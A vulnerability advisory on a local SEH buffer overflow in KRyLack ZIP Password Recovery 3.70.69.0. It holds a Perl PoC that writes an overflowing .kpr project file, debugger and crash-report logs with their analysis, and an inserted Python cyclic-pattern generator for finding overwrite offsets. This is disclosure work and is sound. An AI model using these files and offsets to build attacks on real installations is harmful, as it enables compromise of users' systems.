Document Title:
===============
ZIP Password Recovery v3.70.69.0 - Buffer Overflow

Date:
=====
2020-05-29

References:
===========
https://www.vulnerability-lab.com/get_content.php?id=2258

VL-ID:
=====
2258

Common Vulnerability Scoring System:
====================================
7

Vulnerability Class:
====================
Buffer Overflow

Introduction:
=============
KRyLack ZIP Password Recovery is advanced software to recover lost or forgotten passwords to ZIP (WinZIP) archives.

(Copy of the Homepage: https://www.krylack.com/zip-password-recovery/ )

Abstract:
=========
The Vulnerability Laboratory core research team discovered a local buffer overflow vulnerability in the KRyLack ZIP Password Recovery v3.70.69.0 software.

Affected Product(s):
====================
KRyLack Software
Product: ZIP Password Recovery v3.70.69.0 - Software (Windows x64)

Report-Timeline:
================
2020-06-23: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Exploitation-Technique:
=======================
Local

Severity:
=========
High

Details:
========
A buffer overflow vulnerability has been discovered in the official KRyLack ZIP Password Recovery v3.70.69.0 Windows software. The issue allows overwriting local process registers to compromise the local software process or to elevate local system privileges.

The vulnerability relies on overwriting one of the affected records so that an uncaught exception is thrown. This detours the control flow into the exception-handling code; as a consequence it is possible to simulate an EH return to fetch a pointer and jump to the attacker's own shellcode. There are three locations where the vulnerability can be triggered to overwrite the local registers: decompress (file/path), start by (input|length), and the import of .kpr project files on start.
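The .kpr project-file import trigger described above, as an added example that is not part of this advisory or of KRyLack's software: a Python generator that writes the same section header and project keys the advisory's Perl PoC writes, but fills each key's value from one Metasploit-style cyclic pattern instead of 1024 'A' bytes. With that file, any 4-byte value that turns up in a register, in an overwritten SEH record or in a WER signature field can be mapped back to the exact key and byte offset that produced it, which the all-'A' PoC cannot tell you. The section header, key names and 1024-byte field length are taken from the advisory's PoC; the function names, the CRLF line endings, the 20280-byte pattern bound and the sample register value in `main` are this example's own assumptions.

```python
"""Cyclic-pattern .kpr generator for the KLPassRec project-file import.

Added example, not code from the advisory or from KRyLack.  Section header,
key names and field size follow the advisory's Perl PoC; the pattern logic is
the usual Aa0Aa1... scheme, in which every 4-byte window of the first 20280
bytes is unique, so a crash value can be turned back into (key, offset).
"""
import string
from itertools import product

KPR_SECTION = "[Free ZIP Password Recovery Project Data]"   # Free edition header (from the PoC)
KPR_VERSION = "Version Created=3.70.69"
KPR_KEYS = [                                                 # key order as in the advisory's PoC
    "EncryptedFile", "CurrentPass", "CharsSLatin", "CharsCLatin",
    "CharsSpace", "CharsDigits", "CharsSymbols", "CharsCustom",
    "Charset", "RecoveryType", "MinPassLen", "MaskChar", "Mask",
]
FIELD_LEN = 1024                   # per-key payload size used by the PoC
PATTERN_MAX = 26 * 26 * 10 * 3     # 20280 bytes; beyond that the triplets repeat


def cyclic_pattern(length: int) -> str:
    """Build the Aa0Aa1...Zz9 pattern, truncated to `length` characters."""
    if length > PATTERN_MAX:
        raise ValueError(f"a pattern longer than {PATTERN_MAX} bytes is no longer unique")
    chunks = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase, string.digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def build_kpr(field_len: int = FIELD_LEN):
    """Return (file_bytes, pattern).

    Every key receives its own slice of ONE pattern, so an offset recovered
    later is unique across the whole file, not just within a single key.
    """
    pattern = cyclic_pattern(field_len * len(KPR_KEYS))
    lines = [KPR_SECTION, KPR_VERSION]
    for i, key in enumerate(KPR_KEYS):
        lines.append(key + "=" + pattern[i * field_len:(i + 1) * field_len])
    return ("\r\n".join(lines) + "\r\n").encode("ascii"), pattern


def pattern_offset(pattern: str, value) -> int:
    """Offset of `value` in the pattern, or -1.

    `value` is either an int as read from a 32-bit register / SEH slot
    (little-endian, so 0x41306141 is the bytes "Aa0A") or the 4-char string
    as it appears in memory.
    """
    if isinstance(value, int):
        needle = value.to_bytes(4, "little").decode("latin-1")
    else:
        needle = value
    return pattern.find(needle)


def locate(pattern: str, value, field_len: int = FIELD_LEN):
    """Map a crash value back to (key name, byte offset inside that key's value)."""
    off = pattern_offset(pattern, value)
    if off < 0:
        return None
    return KPR_KEYS[off // field_len], off % field_len


if __name__ == "__main__":
    data, pat = build_kpr()
    with open("bof_pattern.kpr", "wb") as fh:
        fh.write(data)
    # Assumed debugger reading: EIP or the SEH handler slot holds 0x41306141.
    print(locate(pat, 0x41306141))        # -> ('EncryptedFile', 0)
```

Load the generated file in KLPassRec.exe under a debugger exactly as you would the PoC; once the process faults, feed the value from EIP, the overwritten handler pointer in the SEH chain, or the "Fault Module Timestamp" WER signature into `locate()` to learn which project key and which byte of its value landed there. Because all 13 fields (13312 bytes) come from a single pattern shorter than the 20280-byte uniqueness bound, the answer is unambiguous.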
Successful exploitation of the overflow vulnerabilities results in an overwrite of local process registers, allowing compromise of the local computer system or elevation of privileges.

Proof of Concept:
=================
The buffer overflow vulnerabilities can be exploited by low privileged system user accounts without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

--- Debug Logs ---
7773c23e 8b00            mov     eax,dword ptr [eax]  ds:002b:41414141=[NEW ADDRESS]
-
77700000!RtlAllocateHeap+0x13ee:
7773c23e 8b00            mov     eax,dword ptr [eax]
7773c240 8b4b04          mov     ecx,dword ptr [ebx+4]
7773c243 3bc1            cmp     eax,ecx
7773c245 0f8585000000    jne     77700000!RtlAllocateHeap+0x1480 (7773c2d0)
7773c24b 8d7e08          lea     edi,[esi+8]
7773c24e 3bc7            cmp     eax,edi
7773c250 8b7d80          mov     edi,dword ptr [ebp-80h]
7773c253 757b            jne     77700000!RtlAllocateHeap+0x1480 (7773c2d0)

The faulting instruction inside ntdll!RtlAllocateHeap dereferences EAX, which holds 0x41414141, i.e. the "A" filler written by the PoC below: a heap-internal pointer has already been overwritten with attacker-controlled data by the time the next allocation happens.

--- SEH ---
/SafeSEH Module Scanner, item 107
SEH mode=/SafeSEH OFF
Base=0x7d50000 Limit=0x7d9b000
Module version=2.6.0.0
Module Name=C:\Program Files (x86)\Free ZIP Password Recovery\UnAceV2.Dll
-
/SafeSEH Module Scanner, item 108
SEH mode=/SafeSEH OFF
Base=0x10000000 Limit=0x10019000
Module version=5.52
Module Name=C:\Program Files (x86)\Free ZIP Password Recovery\UNZIP32.DLL
-
SAFESEH OFF
/SafeSEH Module Scanner, item 110
SEH mode=/SafeSEH OFF
Base=0x400000 Limit=0x8de000
Module version=3.70.69.0
Module Name=C:\Program Files (x86)\Free ZIP Password Recovery\KLPassRec.exe

The main executable and the two bundled archive DLLs are built without SafeSEH, so an overwritten exception registration record can point at a pop/pop/ret sequence inside any of them. Whether these modules are also loaded at a fixed base (they appear at the default link-time bases 0x400000 and 0x10000000 in this run) has to be confirmed separately with the module's DllCharacteristics; a single scan does not prove the absence of ASLR.

--- Event Error Logs ---
Version=1
EventType=APPCRASH
EventTime=132353201538881860
ReportType=2
Consent=1
UploadTime=132353201542245388
ReportStatus=268435456
ReportIdentifier=12559f73-1250-47d9-8376-2073583e4a6b
IntegratorReportIdentifier=da6c5d15-71ca-4dbb-94b4-cb92514ddb3b
Wow64Host=34404
Wow64Guest=332
NsAppName=KLPassRec.exe
OriginalFilename=KLPassRec.exe
AppSessionGuid=000011ec-0001-009a-1ee2-18d48836d601
TargetAppId=W:0006ecdb58f745b5d1f8122af44c5d4d7e6500000904!00004d16cd45a8372d7e6532c2e6e71c2e1eb01543c3!KLPassRec.exe
TargetAppVer=2017//04//06:12:04:18!309729!KLPassRec.exe
BootId=4294967295
ServiceSplit=1972305920
TargetAsId=347
IsFatal=1
EtwNonCollectReason=1
Response.BucketId=7970bda7222b32b0b9a92fa7771f488b
Response.BucketTable=1
Response.LegacyBucketId=1849061518316882059
Response.type=4
Sig[0].Name=Application Name
Sig[0].Value=KLPassRec.exe
Sig[1].Name=Application Version
Sig[1].Value=3.70.69.0
Sig[2].Name=Application Timestamp
Sig[2].Value=58e62ec2
Sig[3].Name=Fault Module Name
Sig[3].Value=KLPassRec.exe
Sig[4].Name=Fault Module Version
Sig[4].Value=3.70.69.0
Sig[5].Name=Fault Module Timestamp
Sig[5].Value=58e62ec2
Sig[6].Name=Exception Code
Sig[6].Value=c0000005
Sig[7].Name=Exception Offset
Sig[7].Value=00055b42
-
Version=1
EventType=APPCRASH
EventTime=132353201504967293
ReportType=2
Consent=1
UploadTime=132353201508909517
ReportStatus=268435456
ReportIdentifier=d836f870-767e-498c-a94f-2bb5a8d2b2af
IntegratorReportIdentifier=1ed2eb02-fe16-42a3-aabf-3814966c5160
Wow64Host=34404
Wow64Guest=332
NsAppName=KLPassRec.exe
OriginalFilename=KLPassRec.exe
AppSessionGuid=000011ec-0001-009a-1ee2-18d48836d601
TargetAppId=W:0006ecdb58f745b5d1f8122af44c5d4d7e6500000904!00004d16cd45a8372d7e6532c2e6e71c2e1eb01543c3!KLPassRec.exe
TargetAppVer=2017//04//06:12:04:18!309729!KLPassRec.exe
BootId=4294967295
ServiceSplit=1972305920
TargetAsId=347
IsFatal=1
EtwNonCollectReason=1
Response.BucketId=e8e11e527ddb930c789056ed68c1e708
Response.BucketTable=1
Response.LegacyBucketId=1770010231221380872
Response.type=4
Sig[0].Name=Application Name
Sig[0].Value=KLPassRec.exe
Sig[1].Name=Application Version
Sig[1].Value=3.70.69.0
Sig[2].Name=Application Timestamp
Sig[2].Value=58e62ec2
Sig[3].Name=Fault Module Name
Sig[3].Value=StackHash_24fa
Sig[4].Name=Fault Module Version
Sig[4].Value=0.0.0.0
Sig[5].Name=Fault Module Timestamp
Sig[5].Value=00000000
Sig[6].Name=Exception Code
Sig[6].Value=c00001a5
Sig[7].Name=Exception Offset
Sig[7].Value=PCH_31+0x000723CC
-
EventType=BEX
EventTime=132353201482786514
ReportType=2
Consent=1
UploadTime=132353201495385123
ReportStatus=268435456
ReportIdentifier=9704ddf5-1112-4f8d-a3cf-5f6cb850bcb8
IntegratorReportIdentifier=00e3097b-d182-432b-a1ca-4db26143ebfd
Wow64Host=34404
Wow64Guest=332
NsAppName=KLPassRec.exe
OriginalFilename=KLPassRec.exe
AppSessionGuid=000011ec-0001-009a-1ee2-18d48836d601
TargetAppId=W:0006ecdb58f745b5d1f8122af44c5d4d7e6500000904!00004d16cd45a8372d7e6532c2e6e71c2e1eb01543c3!KLPassRec.exe
TargetAppVer=2017//04//06:12:04:18!309729!KLPassRec.exe
BootId=4294967295
ServiceSplit=1972305920
TargetAsId=347
EtwNonCollectReason=1
Response.BucketId=a9f95007cb5b4c548c41b4f965e3e00e
Response.BucketTable=5
Response.LegacyBucketId=2036107489797464078
Response.type=4
Sig[0].Name=Application Name
Sig[0].Value=KLPassRec.exe
Sig[1].Name=Application Version
Sig[1].Value=3.70.69.0
Sig[2].Name=Application Timestamp
Sig[2].Value=58e62ec2
Sig[3].Name=Fault Module Name
Sig[3].Value=KLPassRec.exe
Sig[4].Name=Fault Module Version
Sig[4].Value=3.70.69.0
Sig[5].Name=Fault Module Timestamp
Sig[5].Value=58e62ec2
Sig[6].Name=Exception Offset
Sig[6].Value=00055b42
Sig[7].Name=Exception Code
Sig[7].Value=c0000409
Sig[8].Name=Exception Data
Sig[8].Value=00000015
-
EventType=BEX
EventTime=132353203301725508
ReportType=2
Consent=1
UploadTime=132353203304807843
ReportStatus=268435456
ReportIdentifier=a5078f25-f76a-46ca-9717-fd6a3904aed0
IntegratorReportIdentifier=51874cb6-f2e1-4481-b611-0bd8986014b5
Wow64Host=34404
Wow64Guest=332
NsAppName=KLPassRec.exe
OriginalFilename=KLPassRec.exe
AppSessionGuid=00001a40-0001-009a-c393-90838936d601
TargetAppId=W:0006ecdb58f745b5d1f8122af44c5d4d7e6500000904!00004d16cd45a8372d7e6532c2e6e71c2e1eb01543c3!KLPassRec.exe
TargetAppVer=2017//04//06:12:04:18!309729!KLPassRec.exe
BootId=4294967295
ServiceSplit=1972305920
TargetAsId=392
IsFatal=1
EtwNonCollectReason=1
Response.BucketId=384989210a0ee5447a0c8c8611072ede
Response.BucketTable=5
Response.LegacyBucketId=1877029652145843934
Response.type=4
Sig[0].Name=Application Name
Sig[0].Value=KLPassRec.exe
Sig[1].Name=Application Version
Sig[1].Value=3.70.69.0
Sig[2].Name=Application Timestamp
Sig[2].Value=41414141
Sig[3].Name=Fault Module Name
Sig[3].Value=StackHash_3f75
Sig[4].Name=Fault Module Version
Sig[4].Value=0.0.0.0
Sig[5].Name=Fault Module Timestamp
Sig[5].Value=41414141
Sig[6].Name=Exception Offset
Sig[6].Value=PCH_31+0x000723CC
Sig[7].Name=Exception Code
Sig[7].Value=c0000005
Sig[8].Name=Exception Data
Sig[8].Value=00000008

Reading the four WER records: Wow64Host=34404 (0x8664) and Wow64Guest=332 (0x14c) show a 32-bit KLPassRec.exe running under WOW64 on the x64 host. c0000005 is STATUS_ACCESS_VIOLATION, c0000409 is STATUS_STACK_BUFFER_OVERRUN (the /GS cookie or fast-fail abort, reported as BEX), and c00001a5 is STATUS_INVALID_EXCEPTION_HANDLER, i.e. the exception dispatcher rejected a handler it found in the SEH chain. A fault module of StackHash_xxxx with a PCH_31 offset means the faulting address lay outside every loaded module; in the last record the exception data 00000008 marks an execute (DEP) violation, and both timestamp signatures read 41414141, so the bytes from the .kpr payload have reached the control-flow data WER inspects.

PoC: Exploit

#!/usr/bin/perl
# Local Buffer Overflow Exploit for KRyLack Software ZIP Password Recovery v3.70.69.0
# Vulnerability Laboratory - Benjamin Kunz Mejri
use strict;
use warnings;

my $poc = "bof_poc.kpr";
print "[+] Producing $poc ...";

# Every project key is followed by a 1024-byte 'A' filler. The section
# header is the one written by the Free edition; the Pro edition uses
# "[ZIP Password Recovery Project Data]".
my $buff0  = "[Free ZIP Password Recovery Project Data]";
my $buff1  = "\nVersion Created=3.70.69";
my $buff2  = "\nEncryptedFile=" . "A" x 1024;
my $buff3  = "\nCurrentPass="   . "A" x 1024;
my $buff4  = "\nCharsSLatin="   . "A" x 1024;
my $buff5  = "\nCharsCLatin="   . "A" x 1024;
my $buff6  = "\nCharsSpace="    . "A" x 1024;
my $buff7  = "\nCharsDigits="   . "A" x 1024;
my $buff8  = "\nCharsSymbols="  . "A" x 1024;
my $buff9  = "\nCharsCustom="   . "A" x 1024;
my $buff10 = "\nCharset="       . "A" x 1024;
my $buff11 = "\nRecoveryType="  . "A" x 1024;
my $buff12 = "\nMinPassLen="    . "A" x 1024;
my $buff13 = "\nMaskChar="      . "A" x 1024;
my $buff14 = "\nMask="          . "A" x 1024;
# Default dictionary path of the Windows 10 (x86) installation; single quotes
# keep the backslashes literal.
my $buff15 = "\n" . 'C:\Program Files (x86)\Free ZIP Password Recovery\default_english.kpd';

# '>' truncates, so running the script twice does not append a second copy.
open(my $kpr, '>', $poc) or die "Cannot open $poc: $!";
print $kpr $buff0, $buff1, $buff2,  $buff3,  $buff4,  $buff5,  $buff6,  $buff7,
           $buff8, $buff9, $buff10, $buff11, $buff12, $buff13, $buff14, $buff15;
close($kpr);
print "\n[+] done !\n";

Risk:
=====
The security risk of the local buffer overflow vulnerabilities in the KRyLack ZIP Password Recovery software is estimated as high.

Credits:
========
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by the Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the Vulnerability-Lab team and the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™